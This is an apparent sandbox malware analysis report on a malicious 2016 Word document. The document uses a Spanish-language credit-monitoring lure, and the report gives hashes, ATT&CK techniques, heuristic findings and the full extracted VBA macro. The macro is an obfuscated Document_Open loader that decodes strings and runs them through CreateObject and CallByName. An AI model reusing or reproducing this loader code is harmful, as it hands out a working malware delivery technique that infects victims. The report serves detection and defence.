Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 937dcf7fdf7e6804…

MALICIOUS

Office (OLE)

48.0 KB Created: 2016-08-31 00:29:00 Authoring application: Microsoft Office Word First seen: 2016-10-26
MD5: ebe6a0b46c0d2af19f474ea68b258416 SHA-1: 3df5e5b33dcbda76a2e0f1b2d0cd34d726c14dbc SHA-256: 937dcf7fdf7e68045eec008449246ad7f9231bcf01f7352d1a9a98d1d427974f
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate Malicious Code

This Office document contains a malicious VBA macro that executes upon opening. The macro displays a deceptive message about credit monitoring and then saves the document. The VBA code is obfuscated, indicating an attempt to hide its malicious functionality, which includes using CreateObject and CallByName, common for executing arbitrary code or downloading payloads. The primary technique observed is the use of obfuscated VBA to manipulate the document content and potentially prepare for further malicious actions.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Public Function NGMysvA()
Set NGMysvA = MshWDWQnMOz(CreateObject(CrPWPDkRUKeCkK("-RgdkkVRbqhos")))
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function NGMysvA()
Set NGMysvA = MshWDWQnMOz(CreateObject(CrPWPDkRUKeCkK("-RgdkkVRbqhos")))
End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    WSZoqWGyXM = Mid(TVyRjyb, 2, 2) & Mid(CrPWPDkRUKeCkK("m8k/c7hm2d8"), 3, 1)
CallByName NGMysvA, WSZoqWGyXM, 1, ekmMdgpmt, 0
Set MshWDWQnMOz = NGMysvA
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Public Sub Document_Open()
Módulo1.AAqS
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3557 bytes
SHA-256: 4d88ec99797cd12ab3d24db9c34f44a2f75923e933485467ada48969cec71d39
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Módulo1.AAqS
End Sub


Attribute VB_Name = "Módulo1"
Public Sub AAqS()
ActiveDocument.Content.Select
Selection.Delete
Selection.TypeText ("Alertas Buró monitorea tu situación crediticia, te informa y actualiza vía correo electrónico sobre los cambios más importantes que presente tu información, tales como consultas a tu historial, créditos nuevos y eliminados, modificación o alta de domicilio y actualización por regularización o atraso de pago." & vbCrLf)
Dim GnEmtI
GnEmtI = 46
If GnEmtI < 90 Then
End If
Selection.TypeText ("Activa lertas Buró  que te ofrece seguridad y protección financiera con los beneficios que te ayudaran a cuidar tu historial de credito." & vbCrLf)

Dim mnaX
mnaX = "sCYo"
Dim lpdzPOVR
lpdzPOVR = 32
ActiveDocument.Save
NGMysvA

End Sub
Private Function vAIM()
EkvJ = CrPWPDkRUKeCkK("@n@Bb@`@A/@GP@b@Ay@Cn@Kv@u@FP@bfA4@GX@YPAx@GL@Y@Au@FL@cPAs@FT@afA/@Fb@bfAo@GP@bvAk@GP@c@Ao@F3@YvAy@B3@XvAu@F/@KvAp@FD@cfAgJ@AN@FT@cv@s@D7@XfAp@FT@XvA/@B@@TvA4@GL@c@Ak@F/@KfAN@FT@c@@t@Eb@YPAh@DL@a@Ao@FT@afA/@Bj@KfAD@F7@cvAt@Fv@avAg@FP@QfAo@Fv@YP")
Dim JdACNcxjZ
JdACNcxjZ = "sTpAOAqANkUE"
Dim oFqt
oFqt = 8
Pkijw = CrPWPDkRUKeCkK("j@NvAS@GP@XPAx@GP@KPAP@GH@avAi@FT@bvAy@B@@J@@h@BP@YPAt@GX@NfAT@DT@SPAP@Ev@PPAj@C@@cfAk@GP@aPAv@Cb@Lv@v@Cj@KfAk@Gf@YP@h@Bj@@GT@b@Aj@FD@c@@y@GL@Lf@v@CD@Mf@t@FT@d@Ak@Bb@K@@h@BP@YPAt@GX@NfAT@DT@SPAP@Ev@PPAj@C@@cfAk@GP@aPAv@Cb@Lv@v@Cj@KfAk@Gf@YP@h@B")
vAIM = EkvJ & Pkijw
Dim hFIxNhSjqxQu
hFIxNhSjqxQu = "AwZjAOtIopBAzx"
Dim itVbjxDjsNLiG
itVbjxDjsNLiG = 12
End Function
Private Function ekmMdgpmt()
Pkijw = CrPWPDkRUKeCkK("dkk ,dwonvdqrg")
TRZw = CrPWPDkRUKeCkK("khbx axodbtshnmon")
Dim mXGWRLWi
mXGWRLWi = 2
If mXGWRLWi < 12 Then
Dim ENWhganlsN
ENWhganlsN = "smvzM"
Dim HGpl
HGpl = 44
End If
aXibXZnA = CrPWPDkRUKeCkK("dmb `rr ,")
Dim urFafB
urFafB = 63
If urFafB < 60 Then
urFafB = urFafB + 94
End If
ekmMdgpmt = Pkijw & TRZw & aXibXZnA & vAIM
Dim EZxZ
EZxZ = 67
If EZxZ < 43 Then
End If
End Function
Public Function NGMysvA()
Set NGMysvA = MshWDWQnMOz(CreateObject(CrPWPDkRUKeCkK("-RgdkkVRbqhos")))
End Function
Public Function MshWDWQnMOz(ByVal NGMysvA As Object)
TVyRjyb = CrPWPDkRUKeCkK("8th7qt")
WSZoqWGyXM = Mid(TVyRjyb, 2, 2) & Mid(CrPWPDkRUKeCkK("m8k/c7hm2d8"), 3, 1)
CallByName NGMysvA, WSZoqWGyXM, 1, ekmMdgpmt, 0
Set MshWDWQnMOz = NGMysvA
End Function
Private Function CrPWPDkRUKeCkK(clPMYtx)
Dim itcK, AFQJXo, bOcuSzJLIKL
bOcuSzJLIKL = Len(clPMYtx)
Dim LdUMYXGxJxBAX
LdUMYXGxJxBAX = 56
If LdUMYXGxJxBAX < 12 Then
LdUMYXGxJxBAX = LdUMYXGxJxBAX + 12
End If
For itcK = 1 To bOcuSzJLIKL
Dim xygSOQM
xygSOQM = "cqejLxd"
Dim ORGSmE
ORGSmE = 71
AFQJXo = AFQJXo & Chr(Asc(Mid(clPMYtx, itcK, 1)) + 1)
Next
clPMYtx = AFQJXo
AFQJXo = ""
Dim wmEaV
wmEaV = 4
If wmEaV < 72 Then
End If
Dim qtUUqCXI
qtUUqCXI = Int(bOcuSzJLIKL / 2)
AFQJXo = AFQJXo & Right(clPMYtx, bOcuSzJLIKL - qtUUqCXI) & EUiadvgmdcxz(clPMYtx, qtUUqCXI)
Dim vDWvtWZPxKlivd
vDWvtWZPxKlivd = "zGwMgxw"
Dim fwjzS
fwjzS = 2
CrPWPDkRUKeCkK = AFQJXo
Dim mCZr
mCZr = "feDyalkDMUxxO"
Dim scoQohXP
scoQohXP = 49
End Function
Private Function EUiadvgmdcxz(eSWbj, JrhGFcUlL)
EUiadvgmdcxz = Left(eSWbj, JrhGFcUlL)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.